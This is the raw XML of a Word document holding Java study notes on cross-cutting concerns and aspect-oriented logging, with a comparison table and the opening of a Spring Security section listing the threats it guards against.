          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Cross-Cutting Concerns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6418657B" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1956"/>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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Cross-cutting concerns are aspects of an application that affect multiple parts of the system but are not directly related to the business logic. These concerns are typically non-functional requirements that cut across different layers or modules of an application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F9FAE0" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1956"/>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lastRenderedPageBreak/>
        <w:t>Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They are not part of the core business functionality but are necessary to make the system work properly in terms of performance, security, logging, transactions, error handling, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1A1907" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1956"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Logging, security (authentication and authorization), transaction management, caching, validation, monitoring, and exception handling are all cross-cutting concerns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773ED71D"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Cross-Cutting Concern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF6EDE" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1957"/>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Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Logging the details of method calls for debugging purposes or tracking execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD13E3"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Before("execution(* com.example.service.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C50D21D"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public void logMethodInvocation(JoinPoint joinPoint) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73999D0A"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 xml:space="preserve">    System.out.println("Executing method: " + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A883C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B94C86" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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9"/>
        <w:gridCol w:w="3956"/>
        <w:gridCol w:w="4859"/>
      </w:tblGrid>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="371C8B3D" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10B98BA5" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008045FC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="392F000D" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008045FC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Business Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B21B4A9" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008045FC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cross-Cutting Concerns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="7052B729" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D1686D0"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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="443EC9BB"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Core operations that represent the business rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37CDE18D"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Non-core functionality that impacts multiple parts of the app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="32EDBF1D" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3049910A"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="114DEAE7"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To implement domain-specific functionality and operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75395138"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To manage aspects like security, logging, transactions, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="2009116E" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65C9996B"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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="020F8E91"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Processing orders, calculating totals, handling payments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29DD0B59"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Logging, security, error handling, performance monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="4264B661" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16EE6701"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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52F25420"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Narrow, specific to business needs and domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35922365"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Broad, affects multiple components or layers of the application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="49A690C0" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CB5752A"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Reusability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="485CA280"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Business logic is tightly coupled with the specific functionality of the application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24D2E4F7"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Cross-cutting concerns can be reused across different business logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="26EC8946" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="160BF85C"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Change Frequency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64439665"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Changes based on evolving business requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FED8AA5"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Changes are often related to application-wide concerns (e.g., adding logging, altering security policies)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B5B1825" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Relationship:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA3BDA" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1958"/>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Business logic</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> focuses on fulfilling the application’s primary objectives (what the application is designed to do), while </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cross-cutting concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> deal with aspects that improve the system’s operation but are not directly part of the core functionality (how the application works, like monitoring or security).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396F011" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1958"/>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AOP (Aspect-Oriented Programming)</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is often used to handle cross-cutting concerns. With AOP, developers can separate these concerns from the business logic, making the application more modular and easier to maintain. For example, you can implement logging or transaction management independently from the business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208475CC" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7E0BD" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In a shopping cart application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07656D08" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1959"/>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Business Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Calculating the total amount of a shopping cart, applying discounts, checking out, and processing payment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914927D" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1959"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cross-Cutting Concern</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Logging each action taken by the user, ensuring the transaction is recorded, and managing security by checking whether the user is logged in before making a purchase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544A34D" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="00CE4B95" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By separating cross-cutting concerns from business logic, the code becomes cleaner, more maintainable, and easier to extend without cluttering the core business processes with auxiliary functionalities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155582DF" w14:textId="77777777" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CD643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BCE99B3">
          <v:rect id="_x0000_i2138" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A56017B" w14:textId="77777777" w:rsidR="00894AF5" w:rsidRPr="00CE4B95" w:rsidRDefault="00894AF5">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBCC721" w14:textId="7E890A1D" w:rsidR="00894AF5" w:rsidRPr="00CE4B95" w:rsidRDefault="00894AF5" w:rsidP="00894AF5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="458" w:name="_Toc196307938"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="458"/>
    </w:p>
    <w:p w14:paraId="4BDF3338" w14:textId="77777777" w:rsidR="00894AF5" w:rsidRPr="00CE4B95" w:rsidRDefault="00894AF5" w:rsidP="00D0720A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095524FF" w14:textId="39EFFC60" w:rsidR="00CA332E" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA332E" w:rsidP="00CA332E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="459" w:name="_Toc196307939"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Spring Security?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
    </w:p>
    <w:p w14:paraId="1ABC434F" w14:textId="2AA74B7D" w:rsidR="005A6F56" w:rsidRPr="00CE4B95" w:rsidRDefault="005A6F56" w:rsidP="007934ED">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pring Security is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>powerful and customizable authentication and access control framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Java applications. It provides protection against common threats like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8E839C" w14:textId="77777777" w:rsidR="005A6F56" w:rsidRPr="00CE4B95" w:rsidRDefault="005A6F56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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uthentication/Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E406D6C" w14:textId="77777777" w:rsidR="005A6F56" w:rsidRPr="00CE4B95" w:rsidRDefault="005A6F56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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SRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5312B8CF" w14:textId="77777777" w:rsidR="005A6F56" w:rsidRPr="00CE4B95" w:rsidRDefault="005A6F56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ssion Fixation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109DF6C6" w14:textId="77777777" w:rsidR="005A6F56" w:rsidRPr="00CE4B95" w:rsidRDefault="005A6F56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
